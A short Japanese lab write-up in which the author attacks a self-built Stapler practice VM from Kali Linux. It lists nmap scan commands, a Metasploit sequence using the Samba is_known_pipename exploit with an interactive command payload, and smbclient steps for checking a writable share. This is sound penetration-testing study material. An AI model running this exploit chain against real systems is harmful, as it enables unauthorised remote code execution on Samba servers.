概要
以前構築したStaplerの環境に攻撃を行ってみました。
実行結果
Kali Linux側での実行コマンド
Staplerの情報収集
nmap -n 192.168.1.0/24
nmap -sS -Pn -sV -p- 192.168.1.209
nmap -vvv -A -p 139 192.168.1.209
metasploitでの実行コマンド
search pipename
use exploit/linux/samba/is_known_pipename
show options
set rhosts 192.168.1.209
set rport 139
show payloads
set payload cmd/unix/interact
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
また、動画には含まれていませんが、当該脆弱性の攻撃が成立する条件は以下のものがあります。
- Valid credentials
- Writeable folder in an accessible share
- Server-side path of the writeable folder
上記の条件を満たしているかについて、以下のコマンドで任意のファイルがアップロード可能か試すことで確認することができます。
smbclient -L 192.168.1.209
smbclient //192.168.1.209/tmp
※SMB接続後、任意のファイルをアップします
put test.txt
参考にさせていただいたサイト